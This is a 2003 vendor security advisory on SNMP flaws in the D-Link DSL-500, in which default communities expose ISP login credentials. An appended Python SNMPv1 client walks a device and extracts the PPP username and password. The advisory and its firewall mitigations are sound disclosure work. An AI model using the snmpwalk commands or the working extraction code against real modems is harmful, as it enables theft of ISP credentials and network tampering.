Arhont Ltd - Information Security Company
Arhont Advisory by: Andrei Mikhailovsky (www.arhont.com)

Advisory: D-Link DSL Broadband Modem/Router
Router Model Name: D-Link DSL-500
Model Specific: Other models might be vulnerable as well
Manufacturer site: http://www.dlink.com
Manufacturer contact (UK): Tel: 0800 9175063 / 0845 0800288
Contact Date: 06/03/2003

DETAILS:

While performing general security testing of a network, we found several security vulnerabilities in the D-Link DSL-500 DSL Broadband Modem.

Issue 1:

The default router installation enables an SNMP (Simple Network Management Protocol) agent with the default community names for read and read/write access. The DSL-500 is configured to allow SNMP access from the WAN (Wide Area Network)/Internet side as well as from the LAN.

    andrei@whale:~/bugtraq/DSL-modems$ snmpwalk -Os -c public 192.168.0.1 -v 1
    sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30 Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk Copyright (c) 2000 Dlink Corp.
    sysObjectID.0 = OID: enterprises.171.10.30.1
    sysUpTime.0 = Timeticks: (14246347) 1 day, 15:34:23.47
    ...
    ...

The community name "public" gives read access to the device, allowing enumeration and gathering of sensitive network information. The community name "private" gives read/write access, allowing an attacker to change the network settings of the broadband modem. (Write access is easily confirmed with snmpset against a harmless writable object such as sysContact.0 before touching any network setting.)

Impact: Local and Internet-based attackers can retrieve and change the network settings of the modem.

Risk Factor: Medium/High

Possible Solutions: Block UDP port 161 with a firewall on both the LAN and WAN sides, as the SNMP service cannot be disabled from the web management interface.
Issue 2:

The ISP account information, including the login name and password, is stored on the modem unencrypted and is exposed over SNMP. It can therefore be retrieved with a simple SNMP gathering utility such as snmpwalk:

    andrei@whale:~/bugtraq/DSL-modems$ snmpwalk -Os -c public 192.168.0.1 -v 1
    sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30 Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk
    ...
    ...
    ...
    transmission.23.2.3.1.5.2.1 = STRING: "username@dsl-provider"
    ...
    ...
    transmission.23.2.3.1.6.2.1 = STRING: "password-string"
    ...
    ...
    ...

The two objects are the pppSecuritySecretsIdentity and pppSecuritySecretsSecret columns of the standard PPP Security MIB (RFC 1472; transmission.23 is the ppp group), so the credentials are readable with the read-only community "public" and no write access is needed.

Impact: LAN and Internet-based attackers can retrieve confidential information, namely the ISP login credentials.

Risk Factor: Very High

Possible Solutions: As a temporary solution, block UDP port 161 with a firewall on both the LAN and WAN sides, as the SNMP service cannot be disabled from the web management interface. If the modem has been reachable from the Internet, treat the ISP credentials as exposed and have them changed.

According to the Arhont Ltd. policy, all found vulnerabilities and security issues are reported to the manufacturer 7 days before they are released to the public domain (such as CERT and BUGTRAQ), unless the manufacturer specifically requests otherwise.

If you would like more information about this issue, please do not hesitate to contact the Arhont team at infosec@arhont.com.

Kind Regards,

Andrei Mikhailovsky
Arhont Ltd
http://www.arhont.com
GnuPG Keyserver: blackhole.pca.dfn.de
GnuPG Key: 0xFF67A4F4
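Worked example (added by the editor, not part of the Arhont advisory or any D-Link software): a minimal SNMPv1 client in Python, written here to show what the snmpwalk commands in Issues 1 and 2 actually put on the wire and why the two transmission.23.2.3.1.x rows are the ISP login. It encodes the GetRequest/GetNextRequest BER structure snmpwalk sends with community "public", parses a GetResponse, and flags values under the RFC 1472 pppSecuritySecretsIdentity and pppSecuritySecretsSecret columns. The OID constants are the standard MIB-2/RFC 1472 values; the SAMPLE_RESPONSE packet is constructed from the strings quoted in the advisory, not captured from a device, and the walk() function is the only part that talks to a network.

```python
import socket

# transmission.23 is the ppp group (RFC 1471). The two columns below are pppSecuritySecretsIdentity
# and pppSecuritySecretsSecret from RFC 1472: the rows snmpwalk printed as transmission.23.2.3.1.5/6.
PPP = (1, 3, 6, 1, 2, 1, 10, 23)
CREDENTIAL_COLUMNS = {PPP + (2, 3, 1, 5): "pppSecuritySecretsIdentity",
                      PPP + (2, 3, 1, 6): "pppSecuritySecretsSecret"}
SYS_DESCR_0 = (1, 3, 6, 1, 2, 1, 1, 1, 0)
GET_REQUEST, GET_NEXT_REQUEST, GET_RESPONSE = 0xA0, 0xA1, 0xA2
NULL = b"\x05\x00"                                  # encoded NULL value placeholder used in requests

def ber_tlv(tag, body):                             # BER tag-length-value, definite lengths only
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    length = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length)]) + length + body

def ber_int(v):                                     # minimal two's-complement INTEGER
    return ber_tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))

def ber_oid(oid):
    """OBJECT IDENTIFIER: first two arcs packed into one byte, the rest base-128 encoded."""
    out = bytearray([40 * oid[0] + oid[1]])
    for arc in oid[2:]:
        chunk = [arc & 0x7F]
        while arc := arc >> 7:
            chunk.append(0x80 | (arc & 0x7F))
        out.extend(reversed(chunk))
    return ber_tlv(0x06, bytes(out))

def build_message(community, pdu_tag, request_id, varbinds):
    """SNMPv1 Message = SEQUENCE { version 0, community OCTET STRING, PDU }; varbinds = [(oid, value_tlv)]."""
    vbl = b"".join(ber_tlv(0x30, ber_oid(oid) + value) for oid, value in varbinds)
    pdu = ber_tlv(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + ber_tlv(0x30, vbl))
    return ber_tlv(0x30, ber_int(0) + ber_tlv(0x04, community.encode()) + pdu)

def read_tlv(buf, pos=0):                           # -> (tag, body, position after the element)
    tag, n, pos = buf[pos], buf[pos + 1], pos + 2
    if n & 0x80:                                    # long-form length
        k = n & 0x7F
        n, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + n], pos + n

def decode_oid(body):
    arcs, acc = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs, acc = arcs + [acc], 0
    return tuple(arcs)

def parse_message(pkt):
    """Return (community, pdu_tag, request_id, error_status, [(oid, value_tag, raw_value)])."""
    _, msg, _ = read_tlv(pkt)
    _, version, p = read_tlv(msg)
    assert version == b"\x00", "not an SNMPv1 message"
    _, community, p = read_tlv(msg, p)
    pdu_tag, pdu, _ = read_tlv(msg, p)
    _, rid, p = read_tlv(pdu)
    _, err, p = read_tlv(pdu, p)
    _, _, p = read_tlv(pdu, p)                      # error-index, unused here
    _, vbl, _ = read_tlv(pdu, p)
    varbinds, p = [], 0
    while p < len(vbl):
        _, vb, p = read_tlv(vbl, p)
        _, oid, q = read_tlv(vb)
        tag, val, _ = read_tlv(vb, q)
        varbinds.append((decode_oid(oid), tag, val))
    return (community.decode(), pdu_tag, int.from_bytes(rid, "big", signed=True),
            int.from_bytes(err, "big", signed=True), varbinds)

def find_ppp_secrets(varbinds):
    """Flag OCTET STRING values in the two credential columns as (column, row instance, value)."""
    hits = []
    for oid, tag, val in varbinds:
        for col, name in CREDENTIAL_COLUMNS.items():
            if tag == 0x04 and oid[:len(col)] == col:
                hits.append((name, ".".join(map(str, oid[len(col):])), val.decode(errors="replace")))
    return hits

def walk(host, community, base_oid, timeout=2.0):
    """GetNext loop like snmpwalk -v 1: stops on a noSuchName error or once the OID leaves base_oid."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        oid, rid = base_oid, 1
        while True:
            sock.sendto(build_message(community, GET_NEXT_REQUEST, rid, [(oid, NULL)]), (host, 161))
            _, _, _, err, varbinds = parse_message(sock.recv(4096))
            if err or not varbinds or varbinds[0][0][:len(base_oid)] != base_oid:
                return
            yield varbinds[0]
            oid, rid = varbinds[0][0], rid + 1

# Constructed GetResponse standing in for the modem's answer quoted in the advisory (not a capture).
SAMPLE_RESPONSE = build_message("public", GET_RESPONSE, 1, [
    (PPP + (2, 3, 1, 5, 2, 1), ber_tlv(0x04, b"username@dsl-provider")),
    (PPP + (2, 3, 1, 6, 2, 1), ber_tlv(0x04, b"password-string"))])
```

Against a lab device, `find_ppp_secrets(list(walk("192.168.0.1", "public", PPP)))` returning a non-empty list reproduces Issue 2 with nothing but the read-only community; the same walk over the enterprises subtree (1.3.6.1.4.1) is what Issue 1 calls enumeration. Once UDP port 161 is firewalled as the advisory recommends, walk() raises socket.timeout on its first recv, which is the quickest check that the workaround is in place.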